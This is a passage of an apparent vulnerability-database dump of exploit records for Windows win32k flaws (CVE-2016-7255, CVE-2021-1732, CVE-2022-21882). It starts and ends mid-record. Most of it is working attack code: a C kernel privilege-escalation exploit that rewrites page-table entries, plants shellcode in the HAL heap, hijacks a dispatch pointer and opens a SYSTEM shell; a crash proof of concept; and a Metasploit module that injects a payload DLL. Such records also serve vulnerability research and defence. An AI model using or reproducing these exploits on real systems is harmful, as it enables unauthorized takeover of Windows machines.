FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800 \ncontains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963 \npfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V \n*/ \n \nUINT64 pte = get_pxe_address(virtual_address); \nint pte_offset = pte & 0xFFF; \n//printf(\"PTE: %llx, %x\\n\", pte, pte_offset); \n \nUINT64 pde = get_pxe_address(pte); \nint pde_offset = pde & 0xFFF; \n//printf(\"PDE: %llx, %x\\n\", pde, pde_offset); \n \nUINT64 pdpte = get_pxe_address(pde); \nint pdpte_offset = pdpte & 0xFFF; \n//printf(\"PDPTE: %llx,%x\\n\", pdpte, pdpte_offset); \n \nUINT64 pml4e = get_pxe_address(pdpte); \nint pml4e_offset = pml4e & 0xFFF; \n//printf(\"PML4E: %llx\\n\", pml4e, pml4e_offset); \n \nUINT64 spurious_offset = look_free_entry_pml4(); \nprintf(\"[+] Selected spurious PML4E: %llx\\n\", spurious_offset); \nUINT64 f_e_pml4 = spurious_offset; \nUINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset); \nprintf(\"[+] Spurious PT: %llx\\n\", spurious_pt); \nprintf(\"--------------------------------------------------\\n\\n\"); \n \n \n//Read the physical address of pml4e \nUINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e); \nprintf(\"[+] Content pml4e %llx: %llx\\n\", pml4e, pml4e_pfn); \n// Change the PxE \npml4e_pfn = pml4e_pfn | 0x67; // Set U/S \n \nprintf(\"[+] Patching the Spurious Offset (PML4e) %llx: %llx\\n\",f_e_pml4, pml4e_pfn); \n*((PVOID *)spurious_offset) = (PVOID)pml4e_pfn; \nSleep(0x1); // Sleep for TLB refresh; \n \n//Read the physical address of pdpte \nUINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset); \nprintf(\"[+] Content pdpte %llx: %llx\\n\", pdpte, pdpte_pfn); \n// Change the PxE \npdpte_pfn = pdpte_pfn | 0x67; // Set U/S \nprintf(\"[+] Patching the Spurious Offset (PDPTE) %llx: %llx\\n\", spurious_offset, pdpte_pfn); \n*((PVOID *)spurious_offset) = (PVOID)pdpte_pfn; \nSleep(0x1); // Sleep for TLB refresh; \n \n//Read the physical address of pde \nUINT64 pde_addr = spurious_pt + pde_offset; \nUINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset); \nprintf(\"[+] Content pdpe %llx: %llx\\n\", pde, pde_pfn); \n// Change the PxE \npde_pfn = pde_pfn | 0x67; // Set U/S \nprintf(\"[+] Patching the Spurious Offset (PDE) %llx: %llx\\n\", spurious_offset, pde_pfn); \n*((PVOID *)spurious_offset) = (PVOID)pde_pfn; \nSleep(0x1); // Sleep for TLB refresh; \n \n//Read the physical address of pte \nUINT64 pte_addr = spurious_pt + pte_offset; \nUINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset); \nprintf(\"[+] Content pte %llx: %llx\\n\", pte, pte_pfn); \n// Change the PxE \npte_pfn = pte_pfn | 0x67; // Set U/S \npte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX \nif (patch_original) { \nprintf(\"*** Patching the original location to enable NX...\\n\"); \n*(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn; \n} \n \nprintf(\"[+] Patching the Spurious Offset (PTE) %llx: %llx\\n\", spurious_offset, pte_pfn); \n*((PVOID *)spurious_offset) = (PVOID)pte_pfn; \nSleep(0x1); // Sleep for TLB refresh; \nprintf(\"\\n\\n\"); \nreturn spurious_pt; \n} \n \nUINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) { \nprintf(\"[*] Getting Overwrite pointer: %llx\\n\", target_address); \nUINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE); \nOverwriteAddress += (target_address & 0xFFF); \nprintf(\"OverwriteAddress: %llx\\n\", OverwriteAddress); \nreturn (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset)); \n} \n \nvoid overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) { \nUINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE); \nOverwriteTarget += (target_address & 0xFFF); \nUINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset; \nprintf(\"Patch OverwriteTarget: %llx with %llx\\n\", target, hook_address); \n*(PVOID *)target = (PVOID)hook_address; \n} \n \n \nUINT64 store_shellcode_in_hal(void) { \n//// Finally store the shellcode on the HAL \n \nUINT64 hal_heap_addr = 0xFFFFFFFFFFD00000; \nUINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE); \n \nprintf(\"HAL address: %llx\\n\", hal_heap); \n// 0xffffffffffd00d50 this is a good offset to store shellcode \n// 0xfff - 0xd50 = 0x2af space \n \nmemcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode)); \nreturn 0xffffffffffd00d50; \n} \n \nUINT64 GetHalDispatchTable() { \nPCHAR KernelImage; \nSIZE_T ReturnLength; \nHMODULE hNtDll = NULL; \nUINT64 HalDispatchTable; \nHMODULE hKernelInUserMode = NULL; \nPVOID KernelBaseAddressInKernelMode; \nNTSTATUS NtStatus = STATUS_UNSUCCESSFUL; \nPSYSTEM_MODULE_INFORMATION pSystemModuleInformation; \n \nhNtDll = LoadLibrary(\"ntdll.dll\"); \n \nif (!hNtDll) { \nprintf(\"\\t\\t\\t[-] Failed To Load NtDll.dll: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \nNtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, \"NtQuerySystemInformation\"); \n \nif (!NtQuerySystemInformation) { \nprintf(\"\\t\\t\\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \nNtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength); \n \n// Allocate the Heap chunk \npSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), \nHEAP_ZERO_MEMORY, \nReturnLength); \n \nif (!pSystemModuleInformation) { \nprintf(\"\\t\\t\\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \nNtStatus = NtQuerySystemInformation(SystemModuleInformation, \npSystemModuleInformation, \nReturnLength, \n&ReturnLength); \n \nif (NtStatus != STATUS_SUCCESS) { \nprintf(\"\\t\\t\\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \nKernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base; \nKernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\\\') + 1; \n \nprintf(\"\\t\\t\\t[+] Loaded Kernel: %s\\n\", KernelImage); \nprintf(\"\\t\\t\\t[+] Kernel Base Address: 0x%p\\n\", KernelBaseAddressInKernelMode); \n \nhKernelInUserMode = LoadLibraryA(KernelImage); \n \nif (!hKernelInUserMode) { \nprintf(\"\\t\\t\\t[-] Failed To Load Kernel: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \n// This is still in user mode \nHalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, \"HalDispatchTable\"); \n \nif (!HalDispatchTable) { \nprintf(\"\\t\\t\\t[-] Failed Resolving HalDispatchTable: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \nelse { \nHalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode; \n \n// Here we get the address of HapDispatchTable in Kernel mode \nHalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode); \nprintf(\"\\t\\t\\t[+] HalDispatchTable: 0x%llx\\n\", HalDispatchTable); \n} \n \nHeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation); \n \nif (hNtDll) { \nFreeLibrary(hNtDll); \n} \n \nif (hKernelInUserMode) { \nFreeLibrary(hKernelInUserMode); \n} \n \nhNtDll = NULL; \nhKernelInUserMode = NULL; \npSystemModuleInformation = NULL; \n \nreturn HalDispatchTable; \n} \n \nint __cdecl main(int argc, char** argv) \n{ \nTCHAR pre_username[256]; \nTCHAR post_username[256]; \nDWORD size = 256; \nULONG Interval = 0; \nHMODULE hNtDll = NULL; \nUINT retval; \nUINT64 overwrite_address; \nint overwrite_offset; \n \n// define operating system version specific variables \nunsigned char sc_KPROCESS; \nunsigned int sc_TOKEN; \nunsigned int sc_APLINKS; \nint osversion; \n \nif (argc != 2) { \nprintf(\"Please enter an OS version\\n\"); \nprintf(\"The following OS'es are supported:\\n\"); \nprintf(\"\\t[*] 7 - Windows 7\\n\"); \nprintf(\"\\t[*] 81 - Windows 8.1\\n\"); \nprintf(\"\\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\\n\"); \nprintf(\"\\t[*] 12 - Windows 2012 R2\\n\"); \nprintf(\"\\n\"); \nprintf(\"\\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\\n\"); \nreturn -1; \n} \n \nosversion = _strtoui64(argv[1], NULL, 10); \n \nif(osversion == 7) \n{ \n// the target machine's OS is Windows 7 SP1 \nprintf(\" [+] Windows 7 SP1\\n\"); \nsc_KPROCESS = 0x70; // dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS \nsc_TOKEN = 0x80; // dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80) \nsc_APLINKS = 0x188; // dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY \n \noverwrite_address = GetHalDispatchTable(); // HalDispatchTable \noverwrite_offset = 0x8; // QueryIntervalProfile \n} \nelse if(osversion == 81) \n{ \n// the target machine's OS is Windows 8.1 \nprintf(\" [+] Windows 8.1\\n\"); \nsc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS \nsc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60) \nsc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY \n \noverwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)) \noverwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt) \n} \nelse if(osversion == 10) \n{ \n// the target machine's OS is Windows 10 prior to build 14393 \nprintf(\" [+] Windows 10\\n\"); \nsc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS \nsc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60) \nsc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY \n \noverwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController) \noverwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt) \n} \nelse if(osversion == 12) \n{ \n// the target machine's OS is Windows 2012 R2 \nprintf(\" [+] Windows 2012 R2\\n\"); \nsc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS \nsc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60) \nsc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY \n \noverwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController) \noverwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt) \n} \n// in case the OS version is not any of the previously checked versions \nelse \n{ \nprintf(\" [-] Unsupported version\\n\"); \nprintf(\" [*] Affected 64-bit operating systems\\n\"); \nprintf(\" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\\n\"); \nprintf(\" [*] Windows 8.1 -- cve-2016-7255.exe 81\\n\"); \nprintf(\" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\\n\"); \nprintf(\" [*] Windows 2012 R2 -- cve-2016-7255.exe 12\\n\"); \nreturn -1; \n} \n \nprintf(\"My PID is: %d\\n\", GetCurrentProcessId()); \nGetUserName(pre_username, &size); \nprintf(\"Current Username: %s\\n\", pre_username); \nprintf(\"PML4 Self Ref: %llx\\n\", PML4_SELF_REF); \nprintf(\"Shellcode stored at: %p\\n\", (void *) &shellcode); \nprintf(\"Enter to continue...\\n\"); \ngetchar(); \n \ndo \n{ \nor_address_value_4((void*)PML4_SELF_REF); \n} while (FALSE); \n \nPML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF); \nprintf(\"[*] Self Ref Index: %x\\n\", PML4_SELF_REF_INDEX); \nPML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000); \n \nUINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset); \n \nprintf(\"Original OverwriteTarget pointer: %llx\\n\", original_pointer); \nDWORD pid = GetCurrentProcessId(); \n \n/* Shellcode Patching !! */ \nchar *p = shellcode; \np += 4; // skip the CLI, PUSHF and MOV RAX bytes \n*(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1 \n \np += 12; // Patch shellcode with original value in the Overwrite address \n*(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset); \n \np += 12; // To patch the PID of our process \n \n*(DWORD *)p = (DWORD)pid; \n \np += 17; \n*(unsigned char *)p = (unsigned char)sc_KPROCESS; \n \np += 7; \n*(unsigned int *)p = (unsigned int)sc_APLINKS; \n \np += 20; \n*(unsigned int *)p = (unsigned int)sc_TOKEN; \n \np += 20; \n*(unsigned int *)p = (unsigned int)sc_TOKEN; \n \nUINT64 shellcode_va = store_shellcode_in_hal(); \nprintf(\"[+] w00t: Shellcode stored at: %llx\\n\", shellcode_va); \noverwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset); \n \nif (osversion == 7){ \n// Exploit Win7.1 \nhNtDll = LoadLibrary(\"ntdll.dll\"); \n \nif (!hNtDll) { \nprintf(\"\\t\\t[-] Failed loading NtDll: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \nNtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, \"NtQueryIntervalProfile\"); \n \nif (!NtQueryIntervalProfile) { \nprintf(\"\\t\\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \nNtQueryIntervalProfile(0x1337, &Interval); \n} \n \n \nwhile (1) { \nsize = 256; \nGetUserName(post_username, &size); \nif (memcmp(post_username, pre_username, 256) != 0) break; \n} \nSleep(2000); \nsystem(\"cmd.exe\"); \n \n \nreturn 0; \n} \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/140468/ms16135-escalate.txt", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:16:40", "description": "", "cvss3": {}, "published": "2016-11-14T00:00:00", "type": "packetstorm", "title": "Microsoft Windows kernel win32k Denial Of Service", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-7255"], "modified": "2016-11-14T00:00:00", "id": "PACKETSTORM:139701", "href": "https://packetstormsecurity.com/files/139701/Microsoft-Windows-kernel-win32k-Denial-Of-Service.html", "sourceData": "`/* \nSource: https://github.com/tinysec/public/tree/master/CVE-2016-7255 \n \nFull Proof of Concept: \n \nhttps://github.com/tinysec/public/tree/master/CVE-2016-7255 \nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40745.zip \n \n******************************************************************** \nCreated: 2016-11-09 14:23:09 \nFilename: main.c \nAuthor: root[at]TinySec.net \nVersion 0.0.0.1 \nPurpose: poc of cve-2016-0075 \n********************************************************************* \n*/ \n \n#include <windows.h> \n#include <wchar.h> \n#include <stdlib.h> \n#include <stdio.h> \n \n \n////////////////////////////////////////////////////////////////////////// \n#pragma comment(lib,\"ntdll.lib\") \n#pragma comment(lib,\"user32.lib\") \n \n#undef DbgPrint \nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... ); \nULONG __cdecl DbgPrint(__in char* Format, ...) \n{ \nCHAR* pszDbgBuff = NULL; \nva_list VaList=NULL; \nULONG ulRet = 0; \n \ndo \n{ \npszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR)); \nif (NULL == pszDbgBuff) \n{ \nbreak; \n} \nRtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR)); \n \nva_start(VaList,Format); \n \n_vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList); \n \nDbgPrintEx(77 , 0 , pszDbgBuff ); \nOutputDebugStringA(pszDbgBuff); \n \nva_end(VaList); \n \n} while (FALSE); \n \nif (NULL != pszDbgBuff) \n{ \nHeapFree( GetProcessHeap(), 0 , pszDbgBuff ); \npszDbgBuff = NULL; \n} \n \nreturn ulRet; \n} \n \n \nint _sim_key_down(WORD wKey) \n{ \nINPUT stInput = {0}; \n \ndo \n{ \nstInput.type = INPUT_KEYBOARD; \nstInput.ki.wVk = wKey; \nstInput.ki.dwFlags = 0; \n \nSendInput(1 , &stInput , sizeof(stInput) ); \n \n} while (FALSE); \n \nreturn 0; \n} \n \nint _sim_key_up(WORD wKey) \n{ \nINPUT stInput = {0}; \n \ndo \n{ \nstInput.type = INPUT_KEYBOARD; \nstInput.ki.wVk = wKey; \nstInput.ki.dwFlags = KEYEVENTF_KEYUP; \n \nSendInput(1 , &stInput , sizeof(stInput) ); \n \n} while (FALSE); \n \nreturn 0; \n} \n \nint _sim_alt_shift_esc() \n{ \nint i = 0; \n \ndo \n{ \n_sim_key_down( VK_MENU ); \n_sim_key_down( VK_SHIFT ); \n \n \n_sim_key_down( VK_ESCAPE); \n_sim_key_up( VK_ESCAPE); \n \n_sim_key_down( VK_ESCAPE); \n_sim_key_up( VK_ESCAPE); \n \n_sim_key_up( VK_MENU ); \n_sim_key_up( VK_SHIFT ); \n \n \n} while (FALSE); \n \nreturn 0; \n} \n \n \n \nint _sim_alt_shift_tab(int nCount) \n{ \nint i = 0; \nHWND hWnd = NULL; \n \n \nint nFinalRet = -1; \n \ndo \n{ \n_sim_key_down( VK_MENU ); \n_sim_key_down( VK_SHIFT ); \n \n \nfor ( i = 0; i < nCount ; i++) \n{ \n_sim_key_down( VK_TAB); \n_sim_key_up( VK_TAB); \n \nSleep(1000); \n \n} \n \n \n_sim_key_up( VK_MENU ); \n_sim_key_up( VK_SHIFT ); \n} while (FALSE); \n \nreturn nFinalRet; \n} \n \n \n \nint or_address_value_4(__in void* pAddress) \n{ \nWNDCLASSEXW stWC = {0}; \n \nHWND hWndParent = NULL; \nHWND hWndChild = NULL; \n \nWCHAR* pszClassName = L\"cve-2016-7255\"; \nWCHAR* pszTitleName = L\"cve-2016-7255\"; \n \nvoid* pId = NULL; \nMSG stMsg = {0}; \n \ndo \n{ \n \nstWC.cbSize = sizeof(stWC); \nstWC.lpfnWndProc = DefWindowProcW; \nstWC.lpszClassName = pszClassName; \n \nif ( 0 == RegisterClassExW(&stWC) ) \n{ \nbreak; \n} \n \nhWndParent = CreateWindowExW( \n0, \npszClassName, \nNULL, \nWS_OVERLAPPEDWINDOW|WS_VISIBLE, \n0, \n0, \n360, \n360, \nNULL, \nNULL, \nGetModuleHandleW(NULL), \nNULL \n); \n \nif (NULL == hWndParent) \n{ \nbreak; \n} \n \nhWndChild = CreateWindowExW( \n0, \npszClassName, \npszTitleName, \nWS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD, \n0, \n0, \n160, \n160, \nhWndParent, \nNULL, \nGetModuleHandleW(NULL), \nNULL \n); \n \nif (NULL == hWndChild) \n{ \nbreak; \n} \n \n#ifdef _WIN64 \npId = ( (UCHAR*)pAddress - 0x28 ); \n#else \npId = ( (UCHAR*)pAddress - 0x14); \n#endif // #ifdef _WIN64 \n \nSetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId ); \n \nDbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild); \nDebugBreak(); \n \nShowWindow(hWndParent , SW_SHOWNORMAL); \n \nSetParent(hWndChild , GetDesktopWindow() ); \n \nSetForegroundWindow(hWndChild); \n \n_sim_alt_shift_tab(4); \n \nSwitchToThisWindow(hWndChild , TRUE); \n \n_sim_alt_shift_esc(); \n \n \nwhile( GetMessage(&stMsg , NULL , 0 , 0) ) \n{ \nTranslateMessage(&stMsg); \nDispatchMessage(&stMsg); \n} \n \n \n} while (FALSE); \n \nif ( NULL != hWndParent ) \n{ \nDestroyWindow(hWndParent); \nhWndParent = NULL; \n} \n \nif ( NULL != hWndChild ) \n{ \nDestroyWindow(hWndChild); \nhWndChild = NULL; \n} \n \nUnregisterClassW(pszClassName , GetModuleHandleW(NULL) ); \n \nreturn 0; \n} \n \nint __cdecl wmain(int nArgc, WCHAR** Argv) \n{ \ndo \n{ \nor_address_value_4( (void*)0xFFFFFFFF ); \n} while (FALSE); \n \nreturn 0; \n} \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/139701/ms16135-dos.txt", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2022-02-28T19:38:43", "description": "A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to achieve an out of bounds write operation, eventually leading to privilege escalation. This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021. In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to function on a wider range of Windows 10 targets.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2022-02-28T00:00:00", "type": "zdt", "title": "Win32k ConsoleControl Offset Confusion / Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-28T00:00:00", "id": "1337DAY-ID-37433", "href": "https://0day.today/exploit/description/37433", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = AverageRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n prepend Msf::Exploit::Remote::AutoCheck\n\n include Msf::Exploit::Deprecated\n moved_from 'exploit/windows/local/cve_2021_1732_win32k'\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'Win32k ConsoleControl Offset Confusion',\n 'Description' => %q{\n A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of\n NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being\n treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to\n achieve an out of bounds write operation, eventually leading to privilege escalation.\n\n This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.\n In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is\n is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to\n function on a wider range of Windows 10 targets.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n # CVE-2021-1732\n 'BITTER APT', # exploit as used in the wild\n 'JinQuan', # detailed analysis\n 'MaDongZe', # detailed analysis\n 'TuXiaoYi', # detailed analysis\n 'LiHao', # detailed analysis\n # CVE-2022-21882\n 'L4ys', # github poc\n # both CVEs\n 'KaLendsi', # github pocs\n # Metasploit exploit\n 'Spencer McIntyre' # metasploit module\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread'\n },\n 'Targets' => [\n [ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'Payload' => {\n 'DisableNops' => true\n },\n 'References' => [\n # CVE-2021-1732 references\n [ 'CVE', '2021-1732' ],\n [ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],\n [ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],\n [ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],\n [ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],\n # the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit\n [ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],\n [ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],\n [ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],\n [ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ],\n # CVE-2022-21882 references\n [ 'CVE', '2022-21882' ],\n [ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ],\n [ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ]\n ],\n 'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n 'SideEffects' => []\n }\n }\n )\n )\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return Exploit::CheckCode::Safe\n end\n\n build_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i\n vprint_status(\"Windows Build Number = #{build_num}\")\n\n unless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044)\n print_error('The exploit only supports Windows 10 versions 1803 - 21H2')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\n elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\n elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\n end\n\n encoded_payload = payload.encoded\n execute_dll(\n ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'),\n [encoded_payload.length].pack('I<') + encoded_payload\n )\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "sourceHref": "https://0day.today/exploit/37433", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-04T07:12:42", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2017-01-11T00:00:00", "type": "zdt", "title": "Microsoft Windows Kernel - win32k.sys NtSetWindowLongPtr Privilege Escalation (MS16-135) (2)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-7255"], "modified": "2017-01-11T00:00:00", "id": "1337DAY-ID-26645", "href": "https://0day.today/exploit/description/26645", "sourceData": "/*\r\nSource: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html\r\n \r\nBinary: 